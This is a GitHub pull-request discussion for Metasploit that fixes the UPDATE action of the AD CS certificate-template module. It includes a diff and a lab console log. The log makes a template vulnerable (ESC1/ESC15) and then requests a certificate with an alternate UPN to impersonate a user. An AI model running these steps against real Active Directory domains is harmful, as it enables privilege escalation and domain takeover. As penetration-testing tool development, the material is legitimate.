-
Notifications
You must be signed in to change notification settings - Fork 13.9k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Fix UPDATE certificate templates with admin/ldap/ad_cs_cert_template
#19572
Fix UPDATE certificate templates with admin/ldap/ad_cs_cert_template
#19572
Conversation
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
It looks like when msPKI-Template-Schema-Version
is included in an UPDATE operation, the template becomes unusable. When msPKI-Template-Schema-Version
is included in a CREATE operation and the value is 1 or 2, the template is created with a schema version of 1. I did not test other schema version values.
I think what we might actually want to do is:
- revert the change that removed
msPKI-Template-Schema-Version
from the IGNORED_ATTRIBUTES array - remove the schema version from all of the templates (since they're created as version 1 anyways)
- add the current version to the output of the READ operation (see the patch below)
Also if you don't mind, could you update the spots I missed to note the ESC15 support?
diff --git a/modules/auxiliary/admin/ldap/ad_cs_cert_template.rb b/modules/auxiliary/admin/ldap/ad_cs_cert_template.rb
index 0044830ecb..bfd67a8c8c 100644
--- a/modules/auxiliary/admin/ldap/ad_cs_cert_template.rb
+++ b/modules/auxiliary/admin/ldap/ad_cs_cert_template.rb
@@ -428,6 +428,11 @@ class MetasploitModule < Msf::Auxiliary
print_status(" msPKI-RA-Signature: 0x#{pki_flag.to_s(16).rjust(8, '0')}")
end
+ pki_flag = obj['mkpki-template-schema-version']&.first
+ if pki_flag.present?
+ print_status(" msPKI-Template-Schema-Version: #{pki_flag}")
+ end
+
if obj['mspki-certificate-policy'].present?
if obj['mspki-certificate-policy'].length == 1
if (oid_name = get_pki_oid_displayname(obj['mspki-certificate-policy'].first)).present?
Thanks @smcintyre-r7, I've made these changes in the latest commit. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Alright I ran through this using the templates to both create and update the existing template to be vulnerable to ESC15 to see that it's working.
Testing Output
``` metasploit-framework.pr (S:0 J:0) > show optionsGlobal Options:
Option Current Setting Description
ConsoleLogging false Log all console input and output
LogLevel 3 Verbosity of logs (default 0, max 3)
MeterpreterPrompt meterpreter The meterpreter prompt string
MinimumRank 0 The minimum rank of exploits that will run without explicit confirmation
Prompt metasploit-framework.pr (S:%S J:%J) The prompt string
PromptChar > The prompt character
PromptTimeFormat %H:%M:%S Format for timestamp escapes in prompts
SessionLogging false Log all input and output for sessions
SessionTlvLogging false Log all incoming and outgoing TLV packets
TimestampOutput false Prefix all console output with a timestamp
metasploit-framework.pr (S:0 J:0) > fzuse
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > show options
Module options (auxiliary/admin/ldap/ad_cs_cert_template):
Name Current Setting Required Description
BASE_DN no LDAP base DN if you already have it
CERT_TEMPLATE PR-19572 yes The remote certificate template name
SSL false no Enable SSL on the LDAP connection
TEMPLATE_FILE /home/smcintyre/Repositories/metasploit-framework/data/auxiliary/admin/ldap/ad_cs_cert_template/esc1_template.yaml no Local template definition file
Used when connecting via an existing SESSION:
Name Current Setting Required Description
SESSION no The session to run this module on
Used when making a new connection via RHOSTS:
Name Current Setting Required Description
DOMAIN msflab.local no The domain to authenticate to
PASSWORD Password1! no The password to authenticate with
RHOSTS 192.168.159.10 no The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 389 no The target port
USERNAME smcintyre no The username to authenticate with
Auxiliary action:
Name Description
READ Read the certificate template
View the full module info with the info, or info -d command.
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > read
[*] Running module against 192.168.159.10
[+] Successfully bound to the LDAP server!
[] Discovering base DN automatically
[+] Read certificate template data for: CN=PR-19572,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
[] Certificate template data written to: /home/smcintyre/.msf4/loot/20241022145221_default_192.168.159.10_windows.ad.cs.te_964934.json
[] Certificate Template:
[] distinguishedName: CN=PR-19572,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
[] displayName: PR-19572
[] objectGUID: f0f65d97-d4d4-4e3c-822f-09ca617945c5
[] msPKI-Certificate-Name-Flag: 0x00000001
[] * CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
[] msPKI-Enrollment-Flag: 0x00000000
[] msPKI-Private-Key-Flag: 0x00000010
[] * CT_FLAG_EXPORTABLE_KEY
[] msPKI-RA-Signature: 0x00000000
[] pKIKeyUsage: 0x00000000
[] pKIMaxIssuingDepth: -1
[+] The operation completed successfully!
[] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > delete
[] Running module against 192.168.159.10
[+] Successfully bound to the LDAP server!
[] Discovering base DN automatically
[+] Read certificate template data for: CN=PR-19572,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
[] Certificate template data written to: /home/smcintyre/.msf4/loot/20241022145226_default_192.168.159.10_windows.ad.cs.te_917580.json
[+] The operation completed successfully!
[] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > read
[] Running module against 192.168.159.10
[+] Successfully bound to the LDAP server!
[] Discovering base DN automatically
[-] Auxiliary aborted due to failure: not-found: The specified template was not found.
[] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > create
[*] Running module against 192.168.159.10
[+] Successfully bound to the LDAP server!
[] Discovering base DN automatically
[] Parsing SDDL text: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
[] Creating: CN=PR-19572,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
[+] The operation completed successfully!
[] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > read
[*] Running module against 192.168.159.10
[+] Successfully bound to the LDAP server!
[] Discovering base DN automatically
[+] Read certificate template data for: CN=PR-19572,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
[] Certificate template data written to: /home/smcintyre/.msf4/loot/20241022145233_default_192.168.159.10_windows.ad.cs.te_420036.json
[] Certificate Template:
[] distinguishedName: CN=PR-19572,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
[] displayName: PR-19572
[] objectGUID: 11b06edf-201e-4ade-8130-759c0a4f0f27
[] msPKI-Certificate-Name-Flag: 0x00000001
[] * CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
[] msPKI-Enrollment-Flag: 0x00000000
[] msPKI-Private-Key-Flag: 0x00000010
[] * CT_FLAG_EXPORTABLE_KEY
[] msPKI-RA-Signature: 0x00000000
[] msPKI-Template-Schema-Version: 1
[] pKIKeyUsage: 0x00000000
[] pKIMaxIssuingDepth: -1
[+] The operation completed successfully!
[] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > use icpr_cert
Matching Modules
Name Disclosure Date Rank Check Description
0 auxiliary/admin/dcerpc/icpr_cert . normal No ICPR Certificate Management
1 _ AKA: Certifry . . . .
2 _ AKA: Certipy . . . .
Interact with a module by name or index. For example info 2, use 2 or use auxiliary/admin/dcerpc/icpr_cert
[] Using auxiliary/admin/dcerpc/icpr_cert
[] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
metasploit-framework.pr (S:0 J:0) auxiliary(admin/dcerpc/icpr_cert) > show options
Module options (auxiliary/admin/dcerpc/icpr_cert):
Name Current Setting Required Description
ADD_CERT_APP_POLICY 1.3.6.1.5.2.3.4 no Add certificate application policy OIDs
ALT_DNS no Alternative certificate DNS
ALT_SID no Alternative object SID
ALT_UPN [email protected] no Alternative certificate UPN (format: USER@DOMAIN)
CA msflab-DC-CA yes The target certificate authority
CERT_TEMPLATE ESC15-Test yes The certificate template
ON_BEHALF_OF no Username to request on behalf of (format: DOMAIN\USER)
PFX no Certificate to request on behalf of
Used when connecting via an existing SESSION:
Name Current Setting Required Description
SESSION no The session to run this module on
Used when making a new connection via RHOSTS:
Name Current Setting Required Description
RHOSTS 192.168.159.10 no The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 no The target port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass Password1! no The password for the specified username
SMBUser mhatter no The username to authenticate as
Auxiliary action:
Name Description
REQUEST_CERT Request a certificate
View the full module info with the info, or info -d command.
metasploit-framework.pr (S:0 J:0) auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE PR-19572
CERT_TEMPLATE => PR-19572
metasploit-framework.pr (S:0 J:0) auxiliary(admin/dcerpc/icpr_cert) > unset ADD_CERT_APP_POLICY
Unsetting ADD_CERT_APP_POLICY...
metasploit-framework.pr (S:0 J:0) auxiliary(admin/dcerpc/icpr_cert) > show options
Module options (auxiliary/admin/dcerpc/icpr_cert):
Name Current Setting Required Description
ADD_CERT_APP_POLICY no Add certificate application policy OIDs
ALT_DNS no Alternative certificate DNS
ALT_SID no Alternative object SID
ALT_UPN [email protected] no Alternative certificate UPN (format: USER@DOMAIN)
CA msflab-DC-CA yes The target certificate authority
CERT_TEMPLATE PR-19572 yes The certificate template
ON_BEHALF_OF no Username to request on behalf of (format: DOMAIN\USER)
PFX no Certificate to request on behalf of
Used when connecting via an existing SESSION:
Name Current Setting Required Description
SESSION no The session to run this module on
Used when making a new connection via RHOSTS:
Name Current Setting Required Description
RHOSTS 192.168.159.10 no The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 no The target port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass Password1! no The password for the specified username
SMBUser mhatter no The username to authenticate as
Auxiliary action:
Name Description
REQUEST_CERT Request a certificate
View the full module info with the info, or info -d command.
metasploit-framework.pr (S:0 J:0) auxiliary(admin/dcerpc/icpr_cert) > run
[*] Running module against 192.168.159.10
[] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[] 192.168.159.10:445 - Binding to \cert...
[+] 192.168.159.10:445 - Bound to \cert
[] 192.168.159.10:445 - Requesting a certificate for user mhatter - alternate UPN: [email protected] - digest algorithm: SHA256 - template: PR-19572
[+] 192.168.159.10:445 - The requested certificate was issued.
[] 192.168.159.10:445 - Certificate UPN: [email protected]
[] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20241022145314_default_192.168.159.10_windows.ad.cs_866614.pfx
[] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/dcerpc/icpr_cert) > previous
[] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > update
[] Running module against 192.168.159.10
[+] Successfully bound to the LDAP server!
[] Discovering base DN automatically
[+] Read certificate template data for: CN=PR-19572,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
[] Certificate template data written to: /home/smcintyre/.msf4/loot/20241022150133_default_192.168.159.10_windows.ad.cs.te_142919.json
[] Parsing SDDL text: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
[+] The operation completed successfully!
[] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > update
[*] Running module against 192.168.159.10
[+] Successfully bound to the LDAP server!
[] Discovering base DN automatically
[+] Read certificate template data for: CN=PR-19572,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
[] Certificate template data written to: /home/smcintyre/.msf4/loot/20241022150134_default_192.168.159.10_windows.ad.cs.te_145328.json
[] Parsing SDDL text: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
[+] The operation completed successfully!
[] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > previous
[] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
metasploit-framework.pr (S:0 J:0) auxiliary(admin/dcerpc/icpr_cert) > run
[] Running module against 192.168.159.10
[] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[] 192.168.159.10:445 - Binding to \cert...
[+] 192.168.159.10:445 - Bound to \cert
[] 192.168.159.10:445 - Requesting a certificate for user mhatter - alternate UPN: [email protected] - digest algorithm: SHA256 - template: PR-19572
[+] 192.168.159.10:445 - The requested certificate was issued.
[] 192.168.159.10:445 - Certificate UPN: [email protected]
[] 192.168.159.10:445 - Certificate Policies:
[] 192.168.159.10:445 - * 1.3.6.1.5.2.3.4
[] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20241022150140_default_192.168.159.10_windows.ad.cs_878467.pfx
[] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/dcerpc/icpr_cert) >
</details>
This change introduced an issue with the
admin/ldap/ad_cs_cert_template
module when using theUPDATE
action and the default templates. Removing themsPKI-Template-Schema-Version
from theIGNORED_ATTRIBUTES
array will result in deleting the attribute on the remote server. This is due to the fact that the default certificates templates used by the module don't include this attribute.To fix this, I just added the
msPKI-Template-Schema-Version
attribute to certificate templates and set it to version 2.Verify
Please, follow the steps in the Exploiting ESC4 To Gain Domain Administator Privileges section of the docs.
The installation procedure for ESC4 are in the following PR.
Before the fix (using the default ESC1 template)
After the fix (using the default ESC1 template)
Note that I tested with the other default templates (ESC2 and ESC3) and they still work as expected.